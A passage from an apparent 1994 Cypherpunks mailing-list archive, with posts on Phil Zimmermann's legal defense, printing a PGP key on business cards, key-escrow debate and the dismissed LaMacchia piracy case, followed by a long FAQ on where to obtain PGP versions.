been demonstrated through numerous postings in this and other news groups. As we approach a crucial meeting with the prosecutor, it is particularly encouraging to see that many others are willing to devote themselves, both financially and through volunteered time, to Phil's defense. A number of postings have suggested a variety of support activities ranging from petitions to the President to gatherings in San Jose. Phil's lawyers are concerned that some of these activities would not assist in our efforts to protect his legal interests and could in fact hurt. The upcoming meeting with the prosecutor is not a court hearing, but is a private meeting of counsel. Neither Phil nor any judicial official will be present. It will not be a trial or hearing, but a discussion with the Assistant United States Attorney who is handling Phil's case. As such, it is not an appropriate setting for any public demonstrations of support for Phil or for unrestricted dissemination of cryptography. What Phil needs at that meeting is a quiet environment in which serious legal issues can be discussed candidly in an effort to avoid the necessity for any trial. Given the purposes and importance of the meeting, we -- and most especially Phil ZImmermann -- ask that any of his supporters not come to San Jose for any form of public demonstration. We encourage you instead to continue to support Phil's defense by financial contributions. Communications of support to government officials in Washington, DC are also appropriate and helpful. To the extent that effective representation of Phil's interest permits us to communicate with his supporters, we will periodically post announcements to this and other appropriate news groups. Philip L. Dubois Lawyer -----BEGIN PGP SIGNATURE----- Version: 2.7 iQCVAwUBLwJTObZ7C+AHeDONAQH1jAP/T6ZMSIAbgjfLliPbDALVMaOkuHBHGdeq ny0KPsZhIz6/K6ate8yr1uF84RtdolHMx73DBpSf6L9H7d3zcPVfy3ArAv44J/kZ jX0y36eCcn9pxhtU+41k9vkSLnGaNdiM5JKpehbRLgP0Gm+dAq0tbGNIXwL0XOEq CKmZXTWj/vs= =4hhB -----END PGP SIGNATURE----- From crawford at scruznet.com Fri Dec 30 01:41:19 1994 From: crawford at scruznet.com (Michael D. Crawford) Date: Fri, 30 Dec 94 01:41:19 PST Subject: My "netcard" Message-ID: <199412300941.BAA01313@scruz.net> I thought y'all would be tickled by the "e-card" I made up in preparation for the MacWorld Expo. I made a bunch of cards from Avery 5371 Laser Business Cards (about twelve bucks for 250 cards, at most office supply stores). On the front is a nifty logo, my name, and my e-mail address. No phone or snail address. (I have a regular card for that, or I can write my number on the e-card if I want the recipient to have it). On the back is a headline "PGP Public Key Encryption Key", followed by these instructions: "Enter the key block exactly as shown. Check carefully to ensure that it is correct. Then remove the spaces between the 8 character groups and add to your public keyring." (Suggestions for wording? I don't have much space...) Following is my ASCII-armored public key, in courier font so it is fixed-width and everything lines up nicely. I added a space after every eighth character. Maybe I should use a narrower space and put it after every fourth. To save space (and user typing) I copied my key into a new keyring and removed all the signatures from it before extracting it as ASCII. It is also in a just-readable 5-point size. Finally, it says "For a fully-signed key, finger crawford at maxwell.ucsc.edu". One might ask, "if they can finger, why give the key?" The recipient might not be on the Internet. I don't think you can finger from AOL, and I'm sure you can't from UUCP, AppleLink or CompuServe. In any case, it will be more convenient for the people I meet at the show to enter my key on their laptops back at the hotel, without having to cruise the net looking for my key. I dig it. It needs some sprucing up on the graphic design, but it seems like it will be useful. Regards, Michael D. Crawford crawford at scruznet.com <- Please note change of address. crawford at maxwell.ucsc.edu <- Finger me here for PGP Public Key. From adam at bwh.harvard.edu Fri Dec 30 07:41:57 1994 From: adam at bwh.harvard.edu (Adam Shostack) Date: Fri, 30 Dec 94 07:41:57 PST Subject: Morality masks technical ignorance In-Reply-To: <199412300642.WAA27643@deepthought.pylon.com> Message-ID: <199412301541.KAA10803@bwh.harvard.edu> Blanc asks: | Responding to msg by Adam Shostack ( when bad things happen to | good crypto): | | The technical reason to oppose GAK is that it adds points of | failure to a crypto system which need not be there. Those POF | are not adequately tied to the consequences of their actions | (releasing a key | improperly), and as such will be used as points to attack the | integrity of the system. | ............................................................... | | And if there were no points of failure added by it, would you | approve, agree, to its mandatory requirement? I wouldn't care. First, any GAK system must add points of failure. Second, if it didn't add points of failure, it would be another expensive and pointless government program. Since there are no points of failure, they can never access my key. Thats not because key access is arbitrarily defined as a failure, but because any mechanism that allows them to get my key from a database can be subverted to get keys for which there is no 'legitimate' need. Adam -- "It is seldom that liberty of any kind is lost all at once." -Hume From roy at cybrspc.mn.org Fri Dec 30 08:24:17 1994 From: roy at cybrspc.mn.org (Roy M. Silvernail) Date: Fri, 30 Dec 94 08:24:17 PST Subject: Morality masks technical ignorance In-Reply-To: <199412300642.WAA27643@deepthought.pylon.com> Message-ID: <941230.011239.2D4.rusnews.w165w@cybrspc.mn.org> -----BEGIN PGP SIGNED MESSAGE----- In list.cypherpunks, blancw at pylon.com writes: > > Responding to msg by Adam Shostack ( when bad things happen to > good crypto): > > The technical reason to oppose GAK is that it adds points of > failure to a crypto system which need not be there. [...] > And if there were no points of failure added by it, would you > approve, agree, to its mandatory requirement? Sorry, blanc, but the very existance of GAK is a point of failure. - -- Roy M. Silvernail [ ] roy at cybrspc.mn.org PGP public key available by mail echo /get /pub/pubkey.asc | mail file-request at cybrspc.mn.org These are, of course, my opinions (and my machines) -----BEGIN PGP SIGNATURE----- Version: 2.6.1 iQCVAwUBLwOzQxvikii9febJAQH0XgQAnL/dMtrIgu7L1dgjswOD4LZH6yZHkZ0x V4ZFlm9oCCc089p6XaQgaOZTcBSfKiTlVHq4BXV2EWpm6ULX77rvn1cHSbmOdpvc hjFc8bbPg586if+oGRCNXs2yO5s+KQygQh72w9D3zCVDMaFaJzCZqoa9WmMT6HmM YsJJz5ytGCY= =rlpe -----END PGP SIGNATURE----- From bart at netcom.com Fri Dec 30 08:36:27 1994 From: bart at netcom.com (Harry Bartholomew) Date: Fri, 30 Dec 94 08:36:27 PST Subject: RFCs 1750 & 1751 Message-ID: <199412301636.IAA05937@netcom5.netcom.com> adam at bwh.harvard.edu (Adam Shostack) wrote: > > > > FYI, RFCs 1750 & 1751 have been issued. 1750 discusses generating > strong random numbers. 1751 standardizes a means of converting a 128 > bit number to a set of English words. > > > Adam > > -- > "It is seldom that liberty of any kind is lost all at once." > -Hume Available for ftp at ds.internic.net (not at a lot of other normal rfc sources yet). From eric at remailer.net Fri Dec 30 10:31:35 1994 From: eric at remailer.net (Eric Hughes) Date: Fri, 30 Dec 94 10:31:35 PST Subject: My "netcard" In-Reply-To: <199412300941.BAA01313@scruz.net> Message-ID: <199412301526.HAA05913@largo.remailer.net> From: crawford at scruznet.com (Michael D. Crawford) I made a bunch of cards from Avery 5371 Laser Business Cards (about twelve bucks for 250 cards, at most office supply stores). A good choice for stock. I've done stickers, but they don't work nearly so well. On the back is a headline "PGP Public Key Encryption Key", followed by these instructions: I'd also recommend putting you key fingerprint on the card for those people who _can_ get your key off the Internet and who just want to verify that it's accurate. Eric From nobody at c2.org Fri Dec 30 11:06:34 1994 From: nobody at c2.org (Anonymous User) Date: Fri, 30 Dec 94 11:06:34 PST Subject: My "netcard" Message-ID: <199412301904.LAA11075@zero.c2.org> Michael D. Crawford wrote: > One might ask, "if they can finger, why give the key?" The recipient > might not be on the Internet. I don't think you can finger from AOL, > and I'm sure you can't from UUCP, AppleLink or CompuServe. Yes you can! You just have to know how to use finger-by-email. :) From cactus at hks.net Fri Dec 30 11:20:20 1994 From: cactus at hks.net (L. Todd Masco) Date: Fri, 30 Dec 94 11:20:20 PST Subject: LaMacchia case dismissed Message-ID: <199412301925.OAA08386@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- ============================================================================ SUBJECT: JUDGE DISMISSES INDICTMENT AGAINST MIT COMPUTER WHIZ SOURCE: Reuters via Fulfillment by INDIVIDUAL, Inc. DATE: December 29, 1994 INDEX: [3] ORDER NO: 953095# - ----------------------------------------------------------------------------- BOSTON (Reuter) - The Reuters European Business Report via INDIVIDUAL, Inc. : A federal judge Thursday dismissed an indictment against a Massachusetts Institute of Technology student who had been accused of the biggest case of computer software piracy ever. The student, David LaMacchia, 20, was indicted March 7 on a charge of conspiracy to commit wire fraud. He was accused of using the university's computers to distribute pirated software over the Internet, the web of global computer networks. The U.S. Attorney in Boston, Donald Stern, had called it the largest single case of software piracy to date. Although U.S. District Court Judge Richard Stearns was critical of LaMacchia's actions, he ruled he could not be prosecuted under a wire fraud statute because it could result in a flood of actions against home computer users copying even single software programmes for their own use. However, the judge described LaMacchia as ``heedlessly irresponsible, and at worst as nihilistic, self-indulgent and lacking in any fundamental sense of values.'' According to the indictment, LaMacchia, an electrical engineering and computer science student, used two MIT computers to create bulletin boards from which Internet users could post or copy commercial copywrited software worth close to $1 million. He was accused of using the computer aliases ``John Gaunt'' and ``Grimjack'' to operate the bulletin board from November 1993 to January 1994. LaMacchia was not accused of profiting from the scheme, nor was he accused of personally posting or copying any software on the bulletin board. The Software Publishers Association, a trade group representing software makers, estimates software piracy cost manufacturers about $1.6 billion last year. [12-29-94 at 17:21 EST, Copyright 1994, Reuters America Inc., File: r1229172.000] - ----------------------------------------------------------------------------- Entire contents (C) 1994 by INDIVIDUAL, Inc., 84 Sherman Street, Cambridge, MA 02140 - Phone: 800-414-1000 or 617-354-2230, FAX: 800-417-1000 or 617- 354-6210. =================[The End - HEADSUP FULFILLMENT SERVICE]==================== - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLwRenSoZzwIn1bdtAQEZagF/dGPp8lNH3umZlmpgsYrQB6ucudyneYSj alge2SqCet5p10haY0zVfxBD7WOOW7Uv =Raf8 -----END PGP SIGNATURE----- From tavi at info.polymtl.ca Fri Dec 30 11:35:09 1994 From: tavi at info.polymtl.ca (Octavian Ureche) Date: Fri, 30 Dec 94 11:35:09 PST Subject: Remailer source Message-ID: <199412301935.AA22766@von-neumann.info.polymtl.ca> Does anybody know where could I find UNIX sources for a remailer ? Tnx. Tavi Ureche From witter at utdallas.edu Fri Dec 30 11:48:34 1994 From: witter at utdallas.edu (witter at utdallas.edu) Date: Fri, 30 Dec 94 11:48:34 PST Subject: My "netcard" In-Reply-To: <199412301904.LAA11075@zero.c2.org> Message-ID: On Fri, 30 Dec 1994, Anonymous User wrote: > Michael D. Crawford wrote: > > > One might ask, "if they can finger, why give the key?" The recipient > > might not be on the Internet. I don't think you can finger from AOL, > > and I'm sure you can't from UUCP, AppleLink or CompuServe. > > Yes you can! You just have to know how to use finger-by-email. :) > Just incase you were wondering... TO:infobot at infomania.com Sub: FINGER name at internic.net From rishab at dxm.ernet.in Fri Dec 30 12:16:35 1994 From: rishab at dxm.ernet.in (rishab at dxm.ernet.in) Date: Fri, 30 Dec 94 12:16:35 PST Subject: Morality masks technical ignorance Message-ID: arromdee at blaze.cs.jhu.edu (Ken Arromdee): > >Rishab Aiyer Ghosh: > >As it so happens, hardly anyone here knew about Norton Encrypt so we got > >embroiled in this argument. If we were to adopt a consistently (and solely) > >moral stance, we would accept Detweiler's position that remailers are bad > >and should be banned because they can be easily misused. > > There is a difference between believing that something is wrong (a moral > stance), and believing that force should be used to stop it (a ban). A "If it weren't for nitpickers, we'd all be knee-deep in nits." OK, what I meant of course was that we could adopt the _moral stance_ that remailer misusers (like misbehaving boyfriends) are reprehensible, and that therefore we should not discuss making remailers untraceable (or breaking Norton Encrypt) lest we inadvertantly help the Forces of Evil. OTOH knowledge about anonymous remailers (and the fallibility of Norton Encrypt) is _good_ for privacy - as I said, the latter was not discussed due to apparent technical ignorance. ----------------------------------------------------------------------------- Rishab Aiyer Ghosh "In between the breaths is rishab at dxm.ernet.in the space where we live" rishab at arbornet.org - Lawrence Durrell Voice/Fax/Data +91 11 6853410 Voicemail +91 11 3760335 H 34C Saket, New Delhi 110017, INDIA From mpj at netcom.com Fri Dec 30 12:25:10 1994 From: mpj at netcom.com (Michael Paul Johnson) Date: Fri, 30 Dec 94 12:25:10 PST Subject: Where to Get PGP FAQ Message-ID: -----BEGIN PGP SIGNED MESSAGE----- ===============================BEGIN SIGNED TEXT============================= WHERE TO GET THE PRETTY GOOD PRIVACY PROGRAM (PGP) (Last modified: 30 December 1994 by Mike Johnson) WHAT IS THE LATEST VERSION? |-----------------+---------------------+---------------------------------| | Platform(s) | Latest Version | Distribution File Names | |-----------------+---------------------+---------------------------------| | DOS, Unix, | Viacrypt PGP 2.7 | disk sets | | Mac, Windows, | | | | or WinCIM/CSNav | | | |-----------------+---------------------+---------------------------------| | DOS, Unix, | MIT PGP 2.6.2 | pgp262.zip (DOS + docs) | | others | | pgp262s.zip (source) | | | | pg262s.zip source on CompuServe | | | | pgp262.tar.gz (source) | | | | pgp262.gz (same as above on DOS)| | | | pgp262.tar.Z (source) | | | | pgp262dc.zip (documentation) | | | | pg262d.zip (docs on CompuServe) | |-----------------+---------------------+---------------------------------| | Macintosh | MIT PGP 2.6 | MacPGP2.6.sea.hqx (binary+docs) | | | | macpgp26.hqx (same as above) | | | | MacPGP2.6.src.sea.hqx (source) | | | | macpgp26.src (same as above) | | | | MacPGP2.6-68000.sea.hqx (binary)| | | | mcpgp268.hqx (same as above) | |-----------------+---------------------+---------------------------------| | Mac Applescript | MacPGP 2.6ui v 1.2 | MacPGP-2.6ui-v1.2.sit.hqx | | | + some beta versions| MacPGP2.6ui_V1.2_sources.cpt.hqx| | | based on MIT PGP | MacPGP2.6uiV1.2en.cpt.hqx | | | 2.6.2 | MacPGP2.6uiV1.2src.cpt.hqx | | | | MacPGP2.6uiV1.2.68000.hqx | | | | MacPGP2.6.2.beta.sea.hqx | | | | MacPGP2.6.2.beta.src.sea.hqx | |-----------------+---------------------+---------------------------------| | Amiga | PGP 2.6.2 Amiga 1.4 | pgp262-a14-000.lha | | | | pgp262-a14-020.lha | | | | pgp262-a14-src.lha | |-----------------+---------------------+---------------------------------| | Atari | Atari PGP 2.6ui | pgp26uib.lzh (binary, docs) | | | | pgp26uis.lzh | |-----------------+---------------------+---------------------------------| | Archimedes | Archimedes 2.3a | ArcPGP23a | |-----------------+---------------------+---------------------------------| | Non-USA version | PGP 2.6.i from | pgp26i.zip | | to avoid RSAREF | Stale Schumacher | pgp26is.zip | | license. | | pgp26is.tar.gz | |_________________|_____________________|_________________________________| WHERE CAN I LEARN ABOUT PGP? First, get a copy and read the instructions that come with it. There are also at least two books on PGP. I've read the following and think it is pretty good: Protect Your Privacy: A Guide for PGP Users William Stallings Prentice-Hall, ISBN 0-13-185596-4, $19.95, 300 pages is available at most technical bookstores and many general bookstores such as Barnes and Noble. If you order it from National Computer Security Association (74774.1326 at compuserve.com) they will donate $1 of the price to Phil Zimmermann's legal defense fund. WHERE CAN I GET THE PGP VERSION DIRECTLY FROM PHILIP ZIMMERMANN? This is the MIT version. For several good reasons, Phil is releasing the main line freeware PGP through MIT, at net-dist.mit.edu. See a list of sites that also carry this version, below, or use this WWW URL: http://web.mit.edu/network/pgp-form.html WHAT IS PGP 2.6.i? Stale Schumacher released an international version of PGP built the "right way." By "right way," I mean that it uses the latest MIT code, but uses a different rsaglue.c to use the mpilib instead of RSAREF for RSA calculations, thus including all the latest bug fixes and features in the main freeware PGP code line, but frees non-USA persons from the limitations of the RSAREF license. This release has been as strongly endorsed by Philip Zimmermann as he can do without incriminating himself. Naturally, by not using the RSAREF code for RSA calculations, this version is not legal for use in the USA (other than limited research, etc.), but is fine anywhere else (like Canada) were RSA patents don't hold. Note that the latest version of Stale Schumacher's PGP is 2.6.i, 2.6i (without the second .) was a beta test version that has been superceded. WHAT IS PGP 2.6ui? The "unofficial international" versions are really just PGP 2.3a, modified just enough to make it compatible with MIT PGP 2.6, but do not include all of the fixes in MIT PGP 2.6 and MIT PGP 2.6.1. They have a "ui" somewhere in their file names. I recommend the use of the "ui" versions only if you are using a platform for which there is no Viacrypt or MIT PGP that works properly. For a version that doesn't use RSAREF, PGP 2.6.i from Stale Schumacher is a better choice, because it is more up-to-date. WHERE CAN I GET VIACRYPT PGP? If you are a commercial user of PGP in the USA or Canada, contact Viacrypt in Phoenix, Arizona, USA. The commecial version of PGP is fully licensed to use the patented RSA and IDEA encryption algorithms in commercial and government environments in the USA and Canada. It is fully compatible with, functionally the same as, and just as strong as the freeware version of PGP. Due to limitations on ViaCrypt's RSA distribution license, ViaCrypt only distributes executable code and documentation for it, but they are working on making PGP available for a variety of platforms. Call or write to them for the latest information. The latest version number for Viacrypt PGP is 2.7. Here is a brief summary of Viacrypt's currently-available products: 1. ViaCrypt PGP for MS-DOS. Prices start at $99.98 2. ViaCrypt PGP for UNIX. Includes executables for the following platforms: SunOS 4.1.x (SPARC) IBM RS/6000 AIX HP 9000 Series 700/800 UX SCO 386/486 UNIX SGI IRIX AViiON DG-UX(88/OPEN) Prices start at $149.98 Executables for the following additional platforms are available upon request for an additional $30.00 charge. BSD 386 Ultrix MIPS DECstation 4.x 3. ViaCrypt PGP for WinCIM/CSNav. A special package for users of CompuServe. Prices start at $119.98 Please contact ViaCrypt for quantity discount pricing. Orders may be placed by calling 800-536-2664 during the hours of 8:30am to 5:00pm MST, Monday - Friday. They accept VISA, MasterCard, AMEX and Discover credit cards. If you have further questions, please feel free to contact: Paul E. Uhlhorn Director of Marketing, ViaCrypt Products Mail: 9033 N. 24th Avenue Suite 7 Phoenix AZ 85021-2847 Phone: (602) 944-0773 Fax: (602) 943-2601 Internet: viacrypt at acm.org Compuserve: 70304.41 WHERE CAN I GET THE FREEWARE PGP? These listings are subject to change without notice. If you find that PGP has been removed from any of these sites, please let me know so that I can update this list. Likewise, if you find PGP on a good site elsewhere (especially on any BBS that allows first time callers to access PGP for free), please let me know so that I can update this list. Because this list changes frequently, I have not attempted to keep it complete, but there should be enough pointers to let you easily find PGP. There are several ways to get the freeware PGP: ftp, WWW, BBS, CompuServe, email ftp server, and sneakernet (ask a friend for a copy). Just don't ask Philip Zimmermann directly for a copy. FTP SITES IN NORTH AMERICA There are some wierd hoops to jump through, thanks to the U. S. Department of State, at many of these sites. This is apparently because the U. S. Department of State wants to make it easier for people outside of North America to develop, distribute, use, or sell strong cryptographic software than people inside of the USA and Canada -- at least that is the effect of their rules. Telnet to net-dist.mit.edu, log in as getpgp, answer the questions, then ftp to net-dist.mit.edu and change to the hidden directory named in the telnet session to get your own copy. MIT-PGP is for U. S. and Canadian use only, but MIT is only distributing it within the USA (due to some archaic export control laws). 1. Read ftp://net-dist.mit.edu/pub/PGP/mitlicen.txt and agree to it. 2. Read ftp://net-dist.mit.edu/pub/PGP/rsalicen.txt and agree to it. 3. Telnet to net-dist.mit.edu and log in as getpgp. 4. Answer the questions and write down the directory name listed. 5. QUICKLY end the telnet session with ^C and ftp to the indicated directory on net-dist.mit.edu (something like /pub/PGP/dist/U.S.-only-????) and get the distribution files (see the above chart for names). If the hidden directory name is invalid, start over at step 3, above. You can also get PGP from: ftp.csn.net/mpj See ftp://ftp.csn.net/mpj/README.MPJ ftp.netcom.com/pub/mp/mpj See ftp://ftp.netcom.com/pub/mp/mpj/README.MPJ ftp.eff.org Follow the instructions found in README.Dist that you get from one of: ftp://ftp.eff.org/pub/Net_info/Tools/Crypto/README.Dist gopher.eff.org, 1/Net_info/Tools/Crypto gopher://gopher.eff.org/11/Net_info/Tools/Crypto http://www.eff.org/pub/Net_info/Tools/Crypto/ ftp.csua.berkeley.edu (for U. S. or Canadian users) /pub/cypherpunks/pgp/ ftp.gibbon.com /pub/pgp/README ftp.wimsey.bc.ca /pub/crypto/software/dist/README WORLD WIDE WEB ACCESS http://web.mit.edu/network/pgp-form.html http://www.ifi.uio.no/~staalesc/PGPVersions.html http://www.mantis.co.uk/pgp/pgp.html http://rschp2.anu.edu.au:8080/crypt.html http://www.eff.org/pub/Net_info/Tools/Crypto/ http://community.net/community/all/home/solano/sbaldwin http://www.cco.caltech.edu/~rknop/amiga_pgp26.html COMPUSERVE GO NCSAFORUM. Follow the instructions there to gain access to Library 12: Export Controlled. PGP may be other places, too. Compuserve file names are even more limited than DOS (6.3 instead of the already lame 8.3), so the file names to look for are PGP262.ZIP, PG262S.ZIP (source code), PGP262.GZ (Unix source code) and PG262D.ZIP (documentation only). BULLETIN BOARD SYSTEMS Colorado Catacombs BBS Mike Johnson, sysop Mac and DOS versions of PGP, PGP shells, and some other crypto stuff. Also the home of some good Bible search files and some shareware written by Mike Johnson, including ATBASH, DLOCK, CRYPTA, CRYPTE, CRYPTMPJ, MCP, MDIR, DELETE, PROVERB, SPLIT, ONEPAD, QUICRYPT, etc. v.FAST/v.32bis/v.42bis, speeds up to 28,800 bps 8 data bits, 1 stop, no parity, as fast as your modem will go. Use ANSI terminal emulation, or if you can't, try VT-100. Free access to PGP. If busy or no answer, try again later. For free access: log in with your own name, answer the questions, then select [Q]uestionaire 3 from the [M]ain menu. (303) 772-1062 Longmont, Colorado number - 2 lines. (303) 938-9654 Boulder, Colorado number forwarded to Longmont number intended for use by people in the Denver, Colorado area. The Freedom Files BBS, DeLand Florida, USA 904-738-2691 Exec-Net, New York, NY, USA (Host BBS for the ILink net) 914-667-4567 The Ferret BBS (North Little Rock, Arkansas) (501) 791-0124 also (501) 791-0125 Special PGP users account: login name: PGP USER password: PGP This information from: Jim Wenzel CVRC BBS 317-791-9617 CyberGold BBS 601-582-5748 Self-Governor Information Resource, 915-587-7888, El Paso, Texas, USA In the UK, try 01273-688888 Other BBS -- check your local BBS. Chances are good that it has any release that is at least a month old if it has much of a file area at all. OTHER FTP SITES ftp.informatik.uni-hamburg.de /pub/virus/crypt/pgp This site has most, if not all, of the current PGP files. ftp.ox.ac.uk (163.1.2.4) /pub/crypto/pgp This is a well organized site with most of the current PGP files as well as shells and mailer scripts. ftp.netcom.com /pub/dc/dcosenza -- Some crypto stuff, sometimes includes PGP. ftp.ee.und.ac.za /pub/crypto/pgp ftp.csua.berkeley.edu /pub/cypherpunks/pgp (DOS, MAC) ftp.demon.co.uk /pub/amiga/pgp /pub/archimedes /pub/pgp /pub/mac/MacPGP ftp.informatik.tu-muenchen.de ftp.funet.fi ftp.dsi.unimi.it /pub/security/crypt/PGP ftp.tu-clausthal.de (139.174.2.10) (Atari ST/E,TT,Falcon) /pub/atari/misc/pgp/pgp26uib.lzh (2.6ui ttp, 2.3a docs) /pub/atari/misc/pgp/pgp26uis.lzh (2.6ui sources) /pub/atari/misc/pgp/pgp26ui.diffs (Atari diffs for 2.6 sources) wuarchive.wustl.edu /pub/aminet/util/crypt src.doc.ic.ac.uk (Amiga) /aminet /amiga-boing ftp.informatik.tu-muenchen.de /pub/comp/os/os2/crypt/pgp23os2A.zip (OS/2) iswuarchive.wustl.edu pub/aminet/util/crypt (Amiga) nic.funet.fi (128.214.6.100) /pub/crypt ftp.uni-kl.de (131.246.9.95) /pub/aminet/util/crypt qiclab.scn.rain.com (147.28.0.97) pc.usl.edu (130.70.40.3) leif.thep.lu.se (130.235.92.55) goya.dit.upm.es (138.4.2.2) tupac-amaru.informatik.rwth-aachen.de (137.226.112.31) ftp.etsu.edu (192.43.199.20) princeton.edu (128.112.228.1) pencil.cs.missouri.edu (128.206.100.207) ftp.csua.berkeley.edu kauri.vuw.ac.nz nctuccca.edu.tw /PC/wuarchive/pgp/ ftp.fu-berlin.de:/mac/sys/init/MacPGP2.6uiV1.2en.cpt.hqx.gz Also, try an archie search for PGP. FTPMAIL For those individuals who do not have access to FTP, but do have access to e-mail, you can get FTP files mailed to you. For information on this service, send a message saying "Help" to ftpmail at decwrl.dec.com. You will be sent an instruction sheet on how to use the ftpmail service. It works with messages something like this: > To: ftpmail at decwrl.dec.com > Subject: Ftpmail request > Connect ftp.csua.berkeley.edu > chdir pub/cypherpunks/pgp/pgp262 > uuencode > get pgp262.zip > quit Another e-mail service is from nic.funet.fi. Send mail to mailserv at nic.funet.fi with the word HELP. For the ftp sites on netcom, send mail to ftp-request at netcom.com containing the word HELP in the body of the message. To get pgp 2.6.i by email: Send a message to hypnotech-request at ifi.uio.no with your request in the Subject: field. Subject What you will get GET pgp26i.zip MS-DOS executable (uuencoded) GET pgp26is.zip MS-DOS source code (uuencoded) GET pgp26is.tar.gz UNIX source code (uuencoded) For FAQ information, send e-mail to mail-server at rtfm.mit.edu with send usenet/news.answers/ftp-list/faq in the body of the message. MACPGP OPTIONS There are multiple parallel efforts to write an up-to-date MacPGP. See the following for the latest MacPGP beta stuff. Zbigniew Fiedorowicz has updated his MacPGP to support Apple events, and his distribution comes with complete source code. Grady's netcom directory contains a different version, about which he says "This latest bug release beta 1.23 fixes several relatively minor bugs. Source to this version is NOT available, so its use should be restricted to experimentation only." ftp://ftp.csn.net/mpj/README.MPJ ftp://ataxia.res.wpi.edu/pub/mac-pgp/README ftp://highway.alinc.com/pub/jordyn/mac-pgp/README ftp://ftp.netcom.com/pub/gr/grady/PGP/MacPGP262b1.23.seq.hqx.asc PGP FOR WINDOWS, WINDOWS NT, AND WINDOWS 95 There isn't one, yet, that I know of (at least not a true native Windows application). There are several good shells that call the DOS PGP for the actual work, though. I use Viacrypt's, but there are others available as shareware or freeware at most of the sites listed above for PGP itself. IS MY COPY OF PGP GOOD? If you find a version of the PGP package that does not include the PGP User's Guide, something is wrong. The manual should always be included in the package. PGP should be signed by one of the developers (Philip Zimmermann, Jeff Schiller, Viacrypt, Stale Schumacher, etc.). If it isn't, the package is suspect and should not be used or distributed. The site you found it on should remove it so that it does no further harm to others. To be really sure, you should get PGP directly from MIT or check the signatures with a version of PGP that you trust. The copies of PGP on ftp.csn.net/mpj, ftp.netcom.com/pub/mp/mpj, and the Colorado Catacombs BBS are direct copies of the ones on MIT, except that the ones on the BBS include a BBS advertisement (automatically added by the system when it virus scans new files) in the outer .zip files. OTHER PGP DOCUMENTATION For more information on the "time bomb" in PGP, see ftp://ftp.csn.net/mpj/pgpbomb.asc More PGP details are at http://www.pegasus.esprit.ec.org/people/arne/pgp.html Windows shells documentation http://www.LCS.com/winpgp.html LANGUAGE MODULES These are suitable for most PGP versions. I am not aware of any export/import restrictions on these files. German * _UK:_ ftp://ftp.ox.ac.uk/pub/crypto/pgp/language/pgp23_german.txt * _US:_ ftp://ftp.csn.net/mpj/public/pgp/pgp_german.txt * _US:_ ftp://ftp.csn.net/mpj/public/pgp/PGP_german_docs.lha Italian * _IT:_ ftp://ftp.dsi.unimi.it/pub/security/crypt/PGP/pgp-lang.italian.tar.gz * _FI:_ ftp://ftp.funet.fi/pub/crypt/ghost.dsi.unimi.it/PGP/pgp-lang.italian.tar.gz * _US:_ ftp://ftp.csn.net/mpj/public/pgp/pgp-lang.italian.tar.gz Japanese * _UK:_ ftp://ftp.ox.ac.uk/pub/crypto/pgp/language/pgp23_japanese.tar.gz * _US:_ ftp://ftp.csn.net/mpj/public/pgp/pgp-msgs-japanese.tar.gz Lithuanian * _UK:_ ftp://ftp.ox.ac.uk/pub/crypto/pgp/language/pgp23_lithuanian.zip * _US:_ ftp://ftp.csn.net/mpj/public/pgp/pgp23ltk.zip Russian * _UK:_ ftp://ftp.ox.ac.uk/pub/crypto/pgp/language/pgp26_russian.zip * _RU:_ ftp://ftp.kiae.su/unix/crypto/pgp/pgp26ru.zip (MIT version) * _RU:_ ftp://ftp.kiae.su/unix/crypto/pgp/pgp26uir.zip (ui version) * _US:_ ftp://ftp.csn.net/mpj/public/pgp/pgp26ru.zip Spanish * _IT:_ ftp://ftp.dsi.unimi.it/pub/security/crypt/PGP/pgp-lang.spanish.tar.gz * _FI:_ ftp://ftp.funet.fi/pub/crypt/ghost.dsi.unimi.it/pgp-lang.spanish.tar.gz * _US:_ ftp://ftp.csn.net/mpj/public/pgp/pgp-lang.spanish.tar.gz Swedish * _UK:_ ftp://ftp.ox.ac.uk/pub/crypto/pgp/language/pgp23_swedish.txt * _US:_ ftp://ftp.csn.net/mpj/public/pgp/pgp_swedish.txt MAILINGLISTE FUER PGP UND VERWANDTES (PGP MAILING LIST IN GERMAN) Die Listenadresse: pgp-friends at fiction.pb.owl.de Die *Request*adresse (fuer subscribe/unsubscribe und andere Administra- tiva): pgp-friends-request at fiction.pb.owl.de WHAT IS ALL THIS NONSENSE ABOUT EXPORT CONTROLS? For a detailed rant, get ftp://ftp.csn.net/mpj/cryptusa.zip The practical meaning, until the law is corrected to make sense, is that you are requested to get PGP from sites outside of the USA and Canada if you are outside of the USA and Canada. If you are in France, I understand that you aren't even supposed import it. Other countries may be worse. Make sure you follow the laws of your own country. If you want to officially export PGP, you may be able to get permission in limited cases and for a fee. Contact the U. S. Department of State for information. WHAT INTELLECTUAL PROPERTY RESTRICTIONS EXIST IN THE USA? MIT PGP is only for personal, noncommercial use because of restrictions on the licensing of both the RSA algorithm (attached to RSAREF) and the IDEA algorithm. PKP/RSADSI insist that we use RSAREF instead of the mpi library for reasons that make sense to them. For commercial use, use Viacrypt PGP, which is fully licensed to use both the RSA and IDEA algorithms in commercial and corporate environments (as well as personal use, of course). Another restriction is due to an exclusive marketing agreement between Philip Zimmermann and Viacrypt that applies to the USA and Canada only. Viacrypt has exclusive rights to market PGP commercialy in this area of the world. This means that if you want to market PGP commercially in competition with Viacrypt in the USA or Canada, you would have to create a new implementation of the functions of PGP containing none of Philip Zimmermann's copyrighted code. You are free to modify existing PGP code for your own use, as long as you don't sell it. Phil would also appreciate your checking with him before you distribute any modified versions of PGP as freeware. "PGP", "Pretty Good Privacy" and "Phil's Pretty Good Software" are trademarks owned by Philip Zimmermann. This means that if you modify an older version of PGP that was issued under the copyleft license and distribute it without Phil's permission, you have to call it something else. This avoids confusing all of us and protects Phil's good name. WHAT INTELLECTUAL PROPERTY RESTRICTIONS EXIST IN CANADA? MIT PGP is only for noncommercial use because of restrictions on the licensing of the IDEA algorithm. Because the RSA algorithm isn't patented in Canada, you are free to use the mpi library instead of RSAREF, if you want to, thus freeing yourself of the RSAREF license associated with the RSAREF copyright, which is valid in Canada. For commercial use, use Viacrypt PGP, which is fully licensed to use the IDEA algorithm in commercial and corporate environments. The exclusive marketing agreement with Viacrypt also applies in Canada. See the section on USA intellectual property restrictions for more details. WHAT INTELLECTUAL PROPERTY RESTRICTIONS EXIST OUTSIDE NORTH AMERICA? MIT PGP is only for noncommercial in areas where there is a patent on software implementations of the 